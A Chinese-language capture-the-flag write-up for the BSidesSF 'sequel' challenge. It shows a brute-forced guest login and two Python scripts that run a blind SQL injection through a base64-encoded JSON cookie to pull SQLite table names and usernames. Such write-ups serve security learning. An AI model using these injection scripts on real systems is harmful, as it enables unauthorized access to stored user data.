题目描述
首先是登录,我们爆破一下就好了~~
然后得到用户名和密码均为guest~~
这时登录成功后会返回一个cookie,而且长得很可疑~~
set-cookie: 1337_AUTH=eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9; HttpOnly
base64 解密一下得到
{"username":"guest","password":"guest"}
于是我们猜测是通过cookie注入~·
但是没想到得是数据库是SQLite,而不是mysql,搞了半天~~~
exp
import requests
import base64
import string
import sys
out = ""
while True:
for letter in string.printable:
tmp = out + letter
payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(tmp + '%')
payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
r = requests.get('https://sequel-9cba4c8e.challenges.bsidessf.net/sequels', cookies={"1337_AUTH" : payload})
if "Movie" in r.text:
out = tmp
sys.stdout.write(letter)
sys.stdout.flush()
break
查询所有表名(必须自己手工多次查询)
拆了列名 username,password
import requests
import base64
import string
import sys
out = ""
while True:
for letter in string.printable:
tmp = out + letter
if letter == 'g': continue
payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(tmp + '%')
payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
r = requests.get('https://sequel-9cba4c8e.challenges.bsidessf.net/sequels', cookies={"1337_AUTH" : payload})
if "Movie" in r.text:
out = tmp
sys.stdout.write(letter)
sys.stdout.flush()
break
我们除去g,是因为我们登录得用户名就是guest
最后再附上一张sqlite_master
CREATE TABLE sqlite_master (
type TEXT,
name TEXT,
tbl_name TEXT,
rootpage INTEGER,
sql TEXT
);